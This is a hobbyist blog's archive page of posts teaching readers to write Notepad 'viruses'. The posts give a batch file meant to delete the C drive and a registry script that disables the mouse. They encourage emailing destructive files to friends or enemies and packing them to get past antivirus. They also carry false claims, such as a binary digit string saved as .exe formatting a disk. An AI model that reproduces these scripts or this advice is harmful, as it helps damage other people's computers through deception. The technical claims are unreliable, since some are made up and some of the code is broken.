Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

Thursday, 20 December 2012

Learn To Make Dangerous Virus In A Minute

computer virus
In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Read Below Tutorials On Making Other Viruses


Read more...

Thursday, 7 June 2012

Open Explorer Infinitely





Hi TTH readers, today I am going to make a virus in notepad that opens infinite number of explorer .
You can use this trick to fool you friend.

Follow these steps:

1. Open Notepad and copy paste the following code in it.

explorer
TTH

Read more �
Read more...

Sunday, 29 April 2012

Virus that shut down your friends PC


Hi friends, In my previous post, I have told you how to make shortcut to shut down windows. This virus takes the advantage of the same trick. You can send this virus to your friends in email attachment. As soon as he double click on this shortcut, his computer or laptop will shut down. Isn't it interesting??

As its not a real virus, so antivirus will not block it while attaching. But remember, you wont be able to directly attach this file. For that, first of all put this shortcut in a folder and then compress the folder using winrRAR. Now send this compresser folder.

Here is the overall process. Follow it:
Read more �
Read more...

Monday, 9 April 2012

Virus that makes folder inside a folder infinitely

Hi TTH readers, today I am going to make a virus in notepad that that makes infinite number of folders inside a folder till your hard disk drive gets full.

You can use this trick to fool you friend.

Follow these steps:
1. Open Notepad and copy paste the following code in it.
Read more �
Read more...

Virus that floods desktop with folders

Hi TTH readers, today I am going to make a virus in notepad that floods your PC desktop with unlimited number of folders.

You can use this trick to fool you friend.

Follow these steps:

1. Open Notepad and copy paste the following code in it.

Read more �
Read more...

Thursday, 29 March 2012

How to Send Hidden Text in Mail (Email Steganography)

How to Send Hidden Text in Mail
just go to spammimic.com

here u can encode/decode your message into spam.
to encode messahe click on encode

Read more �
Read more...

Sunday, 29 January 2012

Format Hard Disk using Notepad

Hey friends! Today I am going to show you how to format your Hard Disk with the help of notepad.


  1. Write/copy the following code in notepad :
Read more �
Read more...

Tuesday, 3 January 2012

Make A Virus That Disable Mouse

Make A Virus That Disable Mouse
I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harm-full it will disable your mouse so think before trying it on yourself.

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.

More Tutorial On Computer Viruses


Read more...

Thursday, 22 December 2011

USB Pen Drive Virus


Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++. When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive.
Read more �
Read more...

Tuesday, 29 November 2011

Is you antivirus working perfect ?


               This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

  • First open Notepad and copy below code into it.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  •  Save the file as virus.exe
         As soon as you will run this file you antivirus will detect it as software. If not then you need to change your program.

Read more...

Saturday, 5 November 2011

Create Binary Virus to Format Hard Disk

Create Binary Virus to Format Hard Disk
Today i will show you to make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

How To Create Virus To Format Hard Drive ?

   1. Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
   2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

If for some reason this does not work for you then check out below tutorial


Read more...